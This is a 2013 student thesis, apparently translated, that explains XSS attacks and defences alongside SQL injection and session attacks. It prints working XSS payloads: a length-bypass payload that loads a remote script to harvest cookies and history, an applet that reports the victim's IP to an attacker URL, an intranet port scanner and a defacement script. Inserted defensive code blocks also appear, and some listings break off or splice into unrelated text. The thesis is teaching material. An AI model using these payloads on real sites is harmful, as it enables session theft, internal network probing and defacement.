UNDERSTANDING XSS: ATTACK TECHNIQUES AND DEFENCES


Graduation thesis, 2013

SUPERVISOR'S COMMENTS
Supervisor

M.Sc. Nguyn ng Quang
REVIEWER'S COMMENTS
Reviewer

ACKNOWLEDGEMENTS
First of all, our group would like to thank the lecturers of the Faculty of Information Technology, who taught and guided us with dedication throughout the past semesters and gave us the best conditions for carrying out this project. We would like to express our sincere and deepest thanks to Mr Nguyn ng Quang, who patiently instructed and supervised us and created the best conditions for our group to complete the project. We also thank our families and friends, who discussed the work with us, helped us and encouraged us a great deal throughout. Despite our best efforts, shortcomings are hard to avoid; we respectfully welcome comments from the lecturers and from our fellow students so that the project can be improved further. We sincerely thank you all!

Project team: Nguyn Vn Qu, Nguyn Ngc Liu

TABLE OF CONTENTS
LIST OF FIGURES
LIST OF TABLES
LIST OF ABBREVIATIONS
CHAPTER I: PROBLEM STATEMENT
I. Overview
1. Website
2. Web security
3. Common kinds of security attacks
II. Current situation
III. Objectives and scope
1. Objectives
2. Scope
3. Method
4. Expected results
CHAPTER 2: CONTENT
I. XSS theory
1. Concept
2. Classification
3. Techniques used by XSS
4. Targets of XSS
5. Comparing XSS with some other common attacks
II. XSS attack and exploitation methods
1. General introduction
2. XSS attack methods
3. Exploiting the XSS attack methods
4. XSS attacks through exploitation frameworks
III. XSS worms
1. General introduction
2. Some common XSS worms
IV. Preventing XSS
1. General introduction
2. Filtering
3. Input encoding
4. Output encoding
5. Web browser security
CHAPTER III: Demo
CHAPTER IV: Conclusion
I. Results achieved
1. Theory
2. Demo
II. Strengths and weaknesses
1. Strengths
2. Weaknesses
III. Future work
Appendix: Supporting tools
1. Acunetix Web Vulnerability Scanner 8
2. Grease Monkey
3. Burp

LIST OF FIGURES

Figure 1.1 How a website works
Figure 2.1 Illustration of XSS
Figure 2.2 The non-persistent attack process
Figure 2.3 The persistent attack process
Figure 2.4 The session fixation attack process
Figure 2.5 The session hijacking attack process
Figure 2.6 The JavaScript/CSS API interface when getComputedStyle is used to obtain a user's browsing information
Figure 2.7 The JavaScript Error Message Login Checker interface
Figure 2.8 Invalid Gmail login error from a user
Figure 2.9 Illustration of an intranet attack
Figure 2.10 The XSS process
Figure 2.11 A page with an XSS flaw
Figure 2.12 Result of an XSS phishing attack
Figure 2.13 Result of using Zombie Control to obtain a user's IP address
Figure 2.14 The XSS Attack Library interface
Figure 2.15 Main interface of CheckList
Figure 2.16 Main interface of Encode/Decode
Figure 2.17 Working interface of HTTP Response
Figure 2.18 Differences between XSS payloads in Vulnerability Scanner
Figure 2.19 Workflow of XSS KeyLogger
Figure 2.20 Workflow of Executable Drive-by Downloader
Figure 2.21 Console interface of XSS Cookie Thief
Figure 2.22 Testing a website with the Xenotix XSS Exploit Framework
Figure 2.23 Character-set conversion and character filtering
Figure 2.24 Some main functions of the HTML Purifier library

LIST OF TABLES

Table 2.1 XSS vulnerabilities found on the websites of some large companies
Table 2.2 Some ports used in Attack
Table 2.3 List of BeEF modules
Table 2.4 AutoAttack AttackList
Table 2.5 Comparison of HTML-filtering libraries against XSS
Table 2.6 Output-encoding methods required to prevent Cross Site Scripting

LIST OF ABBREVIATIONS

XSS: Cross Site Scripting

CHAPTER I: PROBLEM STATEMENT

I. Overview

1. Website
A website is a collection of web pages, a kind of hypertext (files in HTML or XHTML form) that presents information on the Internet at a fixed address so that visitors can access and read it. A website is made up of the following components:
- Domain name (Domain): the address of the website.
- Hosting: the place where the website is stored.
- Web pages (Webpage): the content of the information pages.
The first page a user reaches from the domain name is called the home page (Homepage); from there the visitor can open other pages through hyperlinks.
Common characteristics of a website: its information is easy to change and update; users can view it immediately, from anywhere and at any time; there is no limit on where it can be accessed from or on the number of visits.
A website is usually divided into two parts: the user interface (front-end), the part the user interacts with to carry out the actions they want, and the programs that make the website work (back-end), programs written in dedicated languages to serve the processing requests that can arise in a website, stored on the server.
Today web pages fall into two kinds: static and dynamic. A static website is written in HTML page by page, like a brochure[1]; it has no database and no tool for managing the information on the site. Designing or updating the information on such pages requires web-design skills (usually with software such as FrontPage, Dreamweaver, ...). Its content rarely changes.
[1: Brochure: a document that gathers all the information about the page.]

A dynamic website has a database and comes with a site-management tool (Admin Tool) for updating information regularly and managing the components of the site. This kind of website is usually written in programming languages such as PHP, ASP.NET, JSP or Perl, with the database managed through SQL or MySQL.
Operation: a website works on the following principle:

Figure 1.1 How a website works
When a user types an address into the address bar, the DNS server resolves the domain name into the IP address of the requested site. Once it has the IP address, the browser sends a request to the place where the information is stored (the web server) using the GET or POST method of the HTTP protocol. The web server receives the request from the web client, processes it and returns the result. The web client receives the result and displays it on screen for the user. While a website operates there may be a firewall in the path that authenticates access rights, manages and controls the flow of data on the network, protects resources, and records and reports events, acting as an intermediate device. However, when that firewall has vulnerabilities it becomes the first target for attacks on the site's security.

2. Web security

a. Concept:
Security means keeping something from being violated and keeping unwanted information from being disclosed. Web security means keeping the information and resources of a website, or of its users, from being stolen, swapped or corrupted by hackers.

b. The importance of web security:
As of December 2010 there were 255 million websites worldwide.[2] This gives a sense of the enormous number of sites that exist today, and with 255 million sites an even larger amount of information is stored on them.
[2: http://vietnamlib.net/tin-tuc/hoat-dong-tttv-the-gioi/thong-ke-internet-the-gioi-nam-2010.]

These websites belong to many kinds of owner, among them government organisations, large economic groups and influential individuals. For example, if confidential information from a government website were stolen and used for other purposes, the consequences would be extremely dangerous; likewise, if customer information held by a bank, including passwords and account numbers, were stolen, both the bank and its customers would be seriously affected. When its security is attacked, a website is at risk of collapse, which in turn does great harm to the organisation or individual that owns it. These are just two typical examples of the danger a website faces when attacked; as websites grow in scale, security is therefore a matter of survival for every one of them.

3. Common kinds of security attacks
There are many kinds of attack aimed at websites today, but in terms of danger and prevalence they can be grouped into five categories:
- Ordinary security flaws caused by not applying operating-system patches. This is a kind of attack anyone with a little knowledge of web security can carry out.
- SQL Injection, caused by web developers not paying attention to security when programming a site. This is the most common kind of attack. Sites are attacked because they were built without any filter or standard to keep them safe, and because code is copied from many sources without review, which brings the risk of including malicious code.
- Cross Site Scripting (XSS), arising from JavaScript widgets and from the failure to filter input and output. This too is a common kind of attack on websites; a hacker can use it to act with the privileges of a user and to steal information about that user. Like SQL Injection, XSS lives at the web layer and its attack variants revolve around how URLs are encoded.
- Domain-name theft, an attack that serves destructive purposes in particular. The security of a domain name depends on many factors, such as the security of the registrar and the security of the mailbox used to register the domain. If that mailbox is lost, the risk of the domain being stolen is very high; the process is carried out mainly through phishing and XSS aimed at careless users who lack the knowledge to protect themselves.
- Denial of service (DoS/DDoS), an extremely common form of attack in recent times. The targets are usually websites the attacker cannot quickly and easily break into, deface or wipe.
The main methods hackers use are to exhaust the victim's resources (on one or more servers) and to saturate the network link, causing errors that lead the website's server to refuse the requests users send.

II. Current situation

Recently the number of websites in Vietnam that are attacked has been rising, in particular through intrusions into servers (some servers host hundreds of sites): when the server is compromised, every site on it is compromised as well. Cases include that of 6 June, when a hacker group called CmTr exploited a server vulnerability and attacked more than 200 Vietnamese-language websites, and the night of 3 July 2011, when nearly 200 websites with .vn, .com and .net domains hosted on a number of servers were hit, among them the website of the Binh Duong provincial Department of Finance.[3]
[3: http://www.baomoi.com/Bao-dong-tinh-trang-bao-mat-server/76/6602986.epi]

The largest denial-of-service attack ever recorded, aimed at the anti-spam organisation Spamhaus, disrupted web access for many users in several parts of the world. According to AP, Spamhaus, a British-Swiss company that filters fake advertisements for Viagra, diet pills and the like out of users' mailboxes worldwide, suffered a large DDoS attack from mid-March 2013. The DDoS against Spamhaus peaked at 300 billion bits per second, a scale that threatened the Internet's infrastructure and slowed users' network access, rather than merely bringing down one organisation. "This is the largest ever known in the history of the Internet," said Patrick Gilmore of the analytics company Akamai Technologies. "It is a miracle that we are still online," said Spamhaus expert Vincent Hanna. Had the hackers' target been a government's network, that network would have collapsed immediately.[4]
[4: http://www.quantrimang.com.vn/baomat/bao-mat/tin-bao-mat/94602_Internet-chap-chon-vi-vu-tan-cong-DDoS-lon-nhat-lich-su.aspx.]

The above are some examples of the current state of web security. They show that the targets of attack are extremely varied, from government bodies to businesses and the most ordinary users. With ever more sophisticated and audacious methods, hackers cause ever greater damage of every kind, and the people who bear the most of it are web users. The five categories above are typical; among them Cross Site Scripting (XSS), which harms only the client side and is carried out through scripts, nonetheless lets a hacker break into user accounts, steal information, impersonate users, redirect websites or attack internal networks, and it is both extremely common and very dangerous. Hackers using XSS seek to profit from the lack of awareness of the very large population of ordinary users around the world. Yet web users today can entirely prevent and protect themselves from these dangerous attacks if they are equipped with basic knowledge.

III. Objectives and scope

1. Objectives
Given how widespread and dangerous it is today, XSS is a real threat to a great many web users; for that reason our group decided to carry out the project "Understanding XSS attacks and how to defend against them", with the main purpose of showing the attack methods, the danger of XSS attacks, and how to defend against them.

2. Scope
- Study the general concept of XSS.
- Study the attack methods.
- Study the defensive measures.
- Introduce some supporting tools for attack and defence.

3. Method
- Literature study.

4. Expected results
- Present the general concept of XSS.
- Distinguish and recognise the kinds of attack.
- Apply the appropriate defence to each kind of attack.
- Carry out some examples illustrating the attack and defence process.

CHAPTER 2: CONTENT

I. XSS theory

1. Concept
Figure 2.1 Illustration of XSS
Cross-Site Scripting, abbreviated XSS, is an attack technique that inserts into dynamic websites (ASP, PHP, CGI, ...) HTML tags or dangerous script fragments that can harm other users. The dangerous code is usually written in client-side scripting languages such as JavaScript, JScript or DHTML, and may also consist of HTML tags. An XSS attack typically looks like this:
    http://www.xxx.vn//index.php?pg=news&cat=<script>alert('LiXSS')</script>

XSS is a very common kind of web security attack today.

2. Classification

a. Non-Persistent:

Figure 2.2 The non-persistent attack process
Non-persistent (or reflected) XSS is the most common kind of XSS. It occurs when the data is supplied by some web client. A hacker who wants to attack must first find the vulnerability on the website, by attaching a test payload to the web client's request, sending it to the web server and watching the server's response. The attack relies on the site's failure to filter the data taken from the URL: the hacker appends malicious code there and uses it to attack the site. This kind of attack takes effect only once.

b. Persistent:
Persistent (or stored) XSS is a destructive variant with very serious consequences. It occurs when data supplied by the hacker is stored on the server through some function of the website, after which that data is displayed as a matter of course in every user's browser, with no further HTML of its own needed. A user who clicks on the parts that carry the malicious code is hit by the XSS.

Figure 2.3 The persistent attack process
Persistent XSS arises when data from the client is not filtered carefully. It is more harmful than non-persistent XSS because, once a site is affected, the payload carries out its harmful actions against users automatically. Example: when registering as a member, if a hacker enters XSS code in the "about me" field and the website does not check the input carefully, then every visit to that hacker's member page exploits the visitor.

3. Techniques used by XSS

a. Redirection:
Redirection is a basic attack technique. The usual way a hacker attacks users is through a reputable website, because users only trust reputable sites. When the user clicks a link on the site, they are sent to some external page the hacker chose. Hackers use this technique quite widely: on entering a page the user sees links, Flash objects or images that excite curiosity, and clicking on them immediately takes the user to another site chosen by the hacker. There are three forms of redirection:
- Header Redirection: many kinds of code can be used, but mainly the HTTP protocol itself is used to send the user's browser to the site the hacker wants.
- META Redirection: uses HTML tags to redirect to the destination site. It works like header redirection but has the advantage that it can delay the redirect by a set time. It can, however, be disabled by the user and does not work in text-based readers when the user does not click.
- Dynamic Redirection: can be contained in a Flash movie, in JavaScript or in client-side dynamic code. Its advantage is that it can be triggered by events rather than only by time; its drawback is that it depends entirely on the browser to run.
Redirectors usually appear as one link in a URL chain, with parameters following the question mark, for example http://www.youtube.com/watch?v=DVIfi6xGvrw. To avoid exploitation by hackers the URL should be encoded, but that brings disadvantages for users: the URL becomes too long and too hard to remember.

b. HTTP Response Injection:
HTTP Response Injection is a technique concerning hackers who are able to inject into response headers.
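As an added example (not code from the thesis), the following JavaScript shows the server-side defence that neutralises both variants described above: context-aware output encoding. The reflected value from the ?cat= parameter and a stored profile value are rendered once without and once with the encoder; the payload strings, the template and the containsActiveContent check are constructed for the demonstration.

```javascript
// Added example, not code from the thesis: context-aware HTML output encoding,
// the server-side defence that turns both the reflected payload in the ?cat=
// parameter and a stored payload in a profile field into inert text.

// Encode a string for insertion into HTML text or a quoted attribute value.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(s).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Vulnerable template: the untrusted value is concatenated straight into the markup.
function renderUnsafe(category) {
  return '<h1>News: ' + category + '</h1>';
}

// Hardened template: the same value passes through the encoder first.
function renderSafe(category) {
  return '<h1>News: ' + encodeForHtml(category) + '</h1>';
}

// Does the produced markup contain a script element, or a tag carrying an
// event-handler attribute, that the template itself never emits? A quick check
// for unit tests or a response filter.
function containsActiveContent(html) {
  return /<script\b|<[a-z][^>]*\bon[a-z]+\s*=/i.test(html);
}

// Constructed inputs (assumptions for the demo, not values from the thesis):
// the reflected pattern ?pg=news&cat=<script>alert('...')</script>, and a stored
// "about me" value that carries no <script> tag at all, so a filter that only
// looks for that tag would let it through.
const REFLECTED_PAYLOAD = "<script>alert('XSS')</script>";
const STORED_PAYLOAD = '<img src=x onerror=alert(1)>';

function demo() {
  return {
    unsafeReflected: renderUnsafe(REFLECTED_PAYLOAD),
    safeReflected: renderSafe(REFLECTED_PAYLOAD),
    unsafeStored: renderUnsafe(STORED_PAYLOAD),
    safeStored: renderSafe(STORED_PAYLOAD),
  };
}
```

Calling demo() shows the difference: the unsafe outputs still contain a live script element or event handler, while the encoded outputs show the same characters as harmless text. The point of the stored case is that a blacklist for the literal string "script" would not have helped; encoding every untrusted value for the context it lands in does.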
In HTTP Response Injection the point of attack is the structure of the response: every response consists of headers and a body, separated by a blank line, and if a hacker can inject special characters into that boundary the risk of an XSS attack is very high; the user may then suffer cache poisoning and much else. The technique applies where a redirect routine takes a URL as input and must generate the appropriate headers to send the user to the specified resource. Depending on the server platform language and the security features in use, this attack can be blocked; to be safe, however, the input strings for every header should be encoded or filtered carefully.

c. Source with real DHTML:
DHTML (Dynamic HTML) denotes building a web page from several components: static HTML, JavaScript, CSS and the DOM. Characteristics of DHTML:
- Dynamic Content: supported by Internet Explorer. The text and images on the page can be changed after it has been displayed, and the content can change in response to input or to the user clicking.
- Data Binding: in DHTML a database can be connected to a table on the page; supported by Internet Explorer. When the page loads, data from the server database is displayed in the table and can be sorted, filtered and displayed as required.
- Scripting: scripts can be written to change the style and content of the page; they are embedded in the page.
- Object Structure: DHTML follows an object structure, meaning every element is treated as an object in the structure, and each object can be accessed and programmed independently.
A typical page using DHTML is built as follows:
    <head>
      <title>DHTML example</title>
      <script>
        var init = function() {
          var myObj = document.getElementById("navigation");
        };
        window.onload = init;
      </script>
    </head>
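Returning to the redirection and HTTP Response Injection passages above, here is an added example (not code from the thesis) of the check a redirect endpoint should apply before it writes a Location header: refuse any control character (a CR LF pair would end the header and let the attacker append headers or a body), and allow only destinations on known hosts so the endpoint cannot be used as an open redirector. The allowed-host list and the example.com origin are assumptions for the demonstration.

```javascript
// Added example, not code from the thesis: validating a redirect target before
// it is placed in a Location header.
//  - reject CR/LF and other control characters (response header injection)
//  - allow only http(s) destinations on an allow-list of hosts (open redirect)
// The host list and origin below are constructed for the demo.

const ALLOWED_REDIRECT_HOSTS = new Set(['www.example.com', 'accounts.example.com']);
const OWN_ORIGIN = 'https://www.example.com/';

// Returns { ok: true, location } or { ok: false, reason }.
function validateRedirectTarget(rawTarget, allowedHosts = ALLOWED_REDIRECT_HOSTS) {
  if (typeof rawTarget !== 'string' || rawTarget.length === 0) {
    return { ok: false, reason: 'empty' };
  }
  // Decode once so that %0d%0a is caught as well as a literal CR LF.
  let decoded;
  try {
    decoded = decodeURIComponent(rawTarget);
  } catch (e) {
    return { ok: false, reason: 'bad-encoding' };
  }
  if (/[\x00-\x1f\x7f]/.test(decoded)) {
    return { ok: false, reason: 'control-character' };
  }
  // Resolve relative paths against our own origin, then check scheme and host.
  let url;
  try {
    url = new URL(decoded, OWN_ORIGIN);
  } catch (e) {
    return { ok: false, reason: 'unparsable' };
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') {
    return { ok: false, reason: 'scheme' };
  }
  if (!allowedHosts.has(url.hostname)) {
    return { ok: false, reason: 'host-not-allowed' };
  }
  return { ok: true, location: url.href };
}

// The headers a redirect endpoint would emit. A rejected target is never echoed
// back; the user is sent to a fixed safe page instead.
function buildRedirectHeaders(rawTarget) {
  const v = validateRedirectTarget(rawTarget);
  if (!v.ok) {
    return { status: 302, headers: { Location: OWN_ORIGIN }, rejected: v.reason };
  }
  return { status: 302, headers: { Location: v.location }, rejected: null };
}
```

Note that the decode step happens before the control-character test; a filter that inspected only the raw, still percent-encoded parameter would pass "%0d%0a" through and the web framework would decode it afterwards.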

The DHTML-based attack exploits weaknesses in the source code of some dynamic website to insert harmful code that steals or alters information or tracks users. Its operation differs from browser to browser.

d. Bypassing XSS Length Limitations:
This is one of the techniques by which a hacker can insert more special characters than the number normally allowed, by using a compact format and XSS payloads to break the character-count rules and evade the site's detection and blocking system.
    http://www.acme.com/path/to/search.asp?query=">[payload]
In theory only 60 characters can be in
serted after ">, but in practice more are needed to exploit XSS. Example:
    http://www.acme.com/path/to/search.asp?query="><script>eval(location.hash.substr(1))</script>#alert('xss')

Notice that the [payload] part calls JavaScript's eval function; this is the tool used in the technique. A fragment of code longer than the permitted count is broken into pieces no longer than the limit, and in this way an unlimited number of characters can be passed in. Example (the payload is cut off at this point in the source):
    http://www.acme.com/path/to/search.asp?query=">eval(location.hash.substr(1))#functioninclude(url,onload){varscript=document.createElement('script');script.type='text/javascript';script.onload=onload;script.src=url;document.body.appendChild(script)};include('http://www.gnucitizen.org/projects/attackapi/AttackAPIstandalone.js',function(){vardata={agent:$A.getAgent(),platform:$A.getPlatform(),cookies:$A.buildQuery($A.getCookies()),plugins:$A.getPlugins().join(','),ip:$A.getInternalIP(),hostname:$A.getInternalHostname(),extensions:[],states:[],history:[]};varcompleted=0;$A.scanExtensions({onfound:function(signature){data.extensions.push(signature.name)},oncomplete:function(){completed+=1}});$A.scanStates({onfound:function(signature){data.states.push(signature.name)},oncomplete:function(){completed+=1}});$A.scanHistory({onfound:function(url){data.history.push(url)},oncomplete:function(){completed+=1}});vartmr=window.setInterval(function(){if(completed

In another case the hacker works inside a script tag. Example:
    var query_string = "";alert('XSS');//";
    somefunction(query_string);
    function somefunction(query_string) {}

The hacker adds a quote after the site's own quote and a semicolon to end the declaration of query_string, then inserts the code they need and closes the line with // so that JavaScript treats the rest as a comment; this is how the hacker slips past the site's filter. These are only a few simple examples of getting past a site's filter: filter evasion is a fairly simple technique, but it requires the person carrying it out to understand how the site works and to be creative.

4. Targets of XSS
XSS is a very common security attack. Its targets are loosely secured websites, written in PHP or JavaScript, dynamic sites, and users who lack knowledge of XSS. An XSS attack can affect any site that lets users enter data, such as search tools, forms filled in by users, web message boards and guestbooks. Hackers exploit XSS to:
- Access sensitive or restricted information.
- Steal money (bank transactions, online purchases, ...).
- Track users' browsing habits.
- Change the behaviour of the browser.
- Damage the reputation of an individual or company.
- Destroy web applications.
- Carry out denial-of-service attacks.

5. Comparing XSS with some other common attacks

a. SQL Injection:
SQL Injection is one of the most common and most dangerous kinds of attack. It abuses programming flaws in a website's data access: SQL code is inserted into or appended to the web application on the client side, then passed to the SQL server to be parsed and executed. A hacker can obtain information stored in the database such as usernames, passwords and credit-card details.
Cause of the flaw: SQL is the standard language for accessing Microsoft SQL Server, Oracle, MySQL, Sybase and Informix as well as other database servers. A website needs ways of connecting to its database, and these are the places a hacker can exploit. SQL Injection vulnerabilities occur when web developers do not validate input parameters before running queries against the database. There are two forms of exploitation:
- The web programmer builds query strings dynamically from values the user enters; if those values are not validated properly they can be exploited.
- Special characters are handled incorrectly. As shown in the filter-evasion section, a hacker can use special characters to get past the site's filter and exploit it.
Detection: SQL Injection flaws are usually tested for remotely.
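For the quote-breaking example above, here is an added example (not code from the thesis) of the fix on the server side: instead of wrapping the value in quotes by hand, the value is serialised as a JSON string literal and the characters that matter inside a script block are escaped, so the attack string stays one string literal. The INJECTED and CLOSING_TAG values and the parseLiteral helper are constructed for the demonstration.

```javascript
// Added example, not code from the thesis: embedding a server-side value in an
// inline <script> safely. The thesis shows that the template
//   var query_string = "<value>";
// is broken out of with the value  ";alert('XSS');//  . Serialising the value
// as a JSON string and escaping the characters that matter inside a <script>
// block keeps it one string literal whatever it contains.

// Serialise any JSON-compatible value as a JavaScript literal safe for <script>.
function toJsLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')       // "</script>" can no longer close the block
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')  // line separators JSON allows inside strings
    .replace(/\u2029/g, '\\u2029'); // but that older JavaScript engines treat as newlines
}

// Vulnerable template, quoting only, as in the thesis example.
function renderScriptUnsafe(query) {
  return '<script>var query_string="' + query + '";somefunction(query_string);</script>';
}

// Hardened template.
function renderScriptSafe(query) {
  return '<script>var query_string=' + toJsLiteral(query) + ';somefunction(query_string);</script>';
}

// Evaluate a literal with the JavaScript parser itself (no DOM needed) to show
// that it comes back as exactly one string. Used only on output of toJsLiteral.
function parseLiteral(literal) {
  return new Function('return (' + literal + ');')();
}

// Constructed values: the attack string from the thesis, and a value that tries
// to close the script block early.
const INJECTED = '";alert(\'XSS\');//';
const CLOSING_TAG = '</script><script>alert(1)</script>';
```

With the unsafe template the generated source contains query_string="";alert('XSS');// , i.e. an empty literal followed by the attacker's statement. With the safe template the same input becomes the single literal "\";alert('XSS');//" and a closing tag in the value is emitted as \u003c/script\u003e, which the browser's HTML parser never sees as a tag.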
SQL Injection can occur in many kinds of application, but this section concentrates on the web environment because that is where most such flaws occur. Approach:
- Testing by inference: identify every data input of the web application; know which kinds of request can cause anomalies; detect anomalies in the server's responses.
- Confirm the input flaw: GET or POST.
- Database errors: a user sends a request through the SQL Injection flaw, supplying a value with code appended. The web server takes the user data and sends an SQL query to the database server; the syntax of that query may be wrong. The database server receives the altered query and returns an error message to the web server, and the web server reports the error to the user.
Attack techniques: exploiting the distinction between strings and numbers; string injection; numeric injection; combining with UNION.
Prevention:
- Use parameterised statements instead of working directly with the data the user enters.
- Validate data: reject invalid data and accept only valid data.

b. Session Fixation:
Session Manager: manages the issuing of session IDs and the related work of a session.

Figure 2.4 The session fixation attack process
Every web session is issued a session ID that stores information about that session. The session ID is stored like a static password: a hacker who obtains it takes control of the session. The attack using session IDs:
Step 1: Set up a session ID.
Step 2: Deliver that session ID to the victim's browser. This is the hardest and most important step and can be done in three ways: placing the session ID in a URL parameter, in a hidden form field, or in a cookie.
Step 3: Break into the victim's session using the stolen session ID.
Prevention: it is only in web applications that this kind of attack needs to be defended against.
- Method 1: Refuse login with a pre-existing session ID.
- Method 2: Defend against hackers outside the system.
- Method 3: Limit the scope of the session ID: tie the session ID to the browser's address; tie the session ID to the user's SSL-encrypted authentication information; remove the session when the user leaves the system or it expires, which can be done on the server or in the browser (cookie); require users to log out explicitly so that the current session and any sessions still stored on the system are removed; set an expiry time for sessions.

c. Session Hijacking:
Figure 2.5 The session hijacking attack process
Session Hijacking is also an attack aimed at obtaining the session ID, but unlike the session-fixation attack above it targets the victim's browser after the victim has logged in. It gains access only once and does not require keeping the session alive. Attack methods:
- Session ID prediction: after logging in legitimately many times and discovering the rule by which session IDs are generated, the hacker can guess the value the next user will receive.
- Brute-forcing the session ID: the hacker can write a program that searches for session IDs by sending many requests to the server at once, relying on the administrator's habit of issuing IDs based on time and IP address to narrow the search space.
- Stealing the session with a script: the hacker can insert a script that tricks the user and thereby steals the user's session ID; this is done through an XSS flaw.
Prevention: apply all the defences for the session-fixation attack and for XSS.

II. XSS attack and exploitation methods

1. General introduction
With advances in technology hackers can diversify their methods; common techniques include SQL Injection, DDoS, local attacks and XSS. Among them XSS is the one hackers reach for most often. Cross Site Scripting lets an attacker embed malicious JavaScript, VBScript, ActiveX, HTML or Flash into a dynamic page, deceiving users into running the script on their own computer to collect data. XSS can be used to compromise personal information, manipulate or steal cookies, create requests that are indistinguishable from those of a legitimate user, or execute malicious code on the end user's system; the data is usually formatted as a hyperlink containing the malicious content and distributed through any means available on the Internet. This section looks at the main XSS attack methods.

2. XSS attack methods

a. Stealing users' cookies:
A cookie is a reminder that a website stores on your computer so that it can identify you.
When you visit a website it sets a cookie on that machine; instead of repeatedly asking you for the same information, the site's program can save it in a cookie and read the cookie whenever it needs it. Without cookies you would have to re-enter your information on every web screen. The only information a cookie stores is what you yourself shared with the website that created it. Kinds of cookie:
- Session cookie: kept in the computer's memory only for the browsing session and automatically deleted when the browser closes. These cookies are usually stored as an ID; they let you move quickly to a new page without logging in again and are widely used on commercial sites, for example to track the items a consumer adds to a shopping cart.
- Persistent cookie: stored on the computer's hard disk and not deleted when the browser closes. These cookies can record your preferences for each site so that they apply when you return and on later visits. Persistent cookies can be used to identify you and analyse your behaviour while browsing; they can also provide information about the number of visitors, the average time spent on a given page, and login information stored in the site's performance accounting.
- Third-party cookies: cookies that enable marketing or advertising companies.
When a hacker mounts a traditional attack based on users' habits and preferences, instead of attacking broadly the hacker concentrates on the most vulnerable area of the website; with a few simple tricks such as JavaScript, CSS and HTML tags, the attacker achieves goals such as taking over the system or making money transfers.
Checking getComputedStyle in the JavaScript/CSS API: getComputedStyle is a property that retrieves DOM style values; it returns the most recent information about an object. The history of attacks using JavaScript/CSS records brute force as a highly effective method for discovering where users have been. On average a user is exposed to dozens of fraudulent sites; the hacker first compiles a list of the sites most popular with users and then uses that list to monitor the user's visits.
The technique relies on the DOM (Document Object Model) and uses colour differences to detect visited links. By creating links dynamically the attacker can check the getComputedStyle property in JavaScript to extract information about browsing history, a very simple process with a high yield: if a link has one colour, such as blue, the victim has not visited the URL; if the text is purple, they have.
Figure 2.6 The JavaScript/CSS API interface when getComputedStyle is used to obtain a user's browsing information
JavaScript Console Error Login Checker: users frequently log into popular websites, and since the chance of success against these sites is quite high, attackers often mount large-scale attacks. This technique uses a method similar to JavaScript port scanning, checking login errors through the JavaScript console: many websites require a URL for login and return different HTML content depending on whether the login succeeded. For example, to manage user accounts an administrator must be authenticated before accessing the site. If such URLs are loaded automatically through a <script> tag they cause different errors, recorded in the JavaScript console, because the responses are HTML rather than script. The technique uses a very handy tool, the JavaScript Login Checker, which lets the attacker learn whether the target is logged into an account and whether the login succeeded or failed; the hacker can then exploit the information returned by the login process.

Figure 2.7 The JavaScript Error Message Login Checker interface
By clicking the Check button the attacker can see the state of the user's account. Example: with the Gmail service, a trial login is shown as an error message in the JavaScript console.

Figure 2.8 Invalid Gmail login error from a user
Information about the user's login appears here and the attacker can exploit it. Note: the error messages, and the places where the error occurs, differ: the same request made from the same place yields a different result when logged in than when not logged in, so the error messages differ.

b. Attacks through the intranet:
Most of us believe that while browsing the web we are protected by the firewall, isolated behind a private IP address range. On this understanding, assuming that the security software of intranet sites and of the web interfaces of devices such as routers, firewall systems and IP phones keeps us safe even when patches have not been applied, which seems not very realistic. A web browser can be controlled entirely by any website, which lets the user become the focal point of intranet attacks. Imagine visiting a website containing malicious JavaScript: it could automatically reconfigure the router or firewall and open a tunnel to the outside network.
Figure 2.9 Illustration of an intranet attack
Exploitation steps:
Step 1: A victim visits a malicious website or clicks an ambiguous link and is served JavaScript containing malware, which then controls their browser.
Step 2: The JavaScript malware loads a Java applet that reveals the victim's IP address behind NAT.
Step 3: Using the victim's browser as an attack platform, the malicious JavaScript identifies web servers on the intranet.
Step 4: It launches attacks against the internal or external sites, collects the stolen information and sends it out to the external network.
Obtaining the NAT IP address: to obtain the IP the hacker sends a special Java applet capable of extracting it, here using the class MyAddress.class written in Java; once the code in MyAddress.class is loaded it opens a URL http://attacker/demo.html?IP=XXXX for remote access and returns the wanted IP address. The executing code follows:

Port scanning
With the browser's internal IP address captured, the local range of the web server can be scanned; if for some reason the internal address cannot be obtained, addresses in the private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16) can be guessed, though that is much less effective. Continuing with 192.168.0.100 as the browser's IP address and supposing the class C range 192.168.0.0-255 is to be scanned on port 80, the following code is used (the listing is cut off in the source):
    /* record the event */
    window.onerror = err;
    /* start scanning the internal network */
    scanWebServers(internal_ip);
    /* scan the internal network */
    function scanWebServers(ip) {
      /* split the last octet off the internal address */
      var net = ip.substring(0, ip.lastIndexOf('.') + 1);
      /* run from 0 to 255 for the last octet */
      var start = 0; var end = 255; var x = start; var timeout = 0;
      /* schedule the blocks with increasing setTimeout values and stop each one
         with window.stop(): when no web server answers at an address the browser
         would otherwise hang until the connection times out, and many
         simultaneous connections would amount to a DoS */
      while (x < end) {
        timeout += 500;
        var y = x + 20;
        if (y > end) { y = end; }
        /* send the block of IPs to scan */
        setTimeout("scan(" + x + "," + y + ",'" + net + "')", timeout);
        timeout += 6000;
        self.setTimeout("window.stop();", timeout);
        x += 21;
      }
    } // end of the web-server scan
    /* scan a block of IPs */
    function scan(start, end, range) {
      var start_num = 0;
      if (start) { start_num = start; }
      var end_num = 255;
      if (end) { end_num = end; }
      /* loop through the number range */
      for (var n = start_num; n
The file story.js may be a passage of text describing information or accompanied by some image. For example, a URL containing script that carries out XSS:
    http://ha.ckers.org/weird/stallowned.js
The content of stallowned.js is defined as follows:
    var title = "XSS Defacement";
    var bgcolor = "#000000";
    var image_url = "http://ha.ckers.org/images/stallowned.jpg";
    var text = "This page has been Hacked!";
    var font_color = "#FF0000";
    deface(title, bgcolor, image_url, text, font_color);
    function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
      document.title = pageTitle;
      document.body.innerHTML = '';
      document.bgColor = bgColor;
      var overLay = document.createElement("div");
      overLay.style.textAlign = 'center';
      document.body.appendChild(overLay);
      var txt = document.createElement("p");
      txt.style.font = 'normal normal bold 36px Verdana';
      txt.style.color = fontColor;
      txt.innerHTML = pageText;
      overLay.appendChild(txt);
      if (image_url != "") {
        var newImg = document.createElement("img");
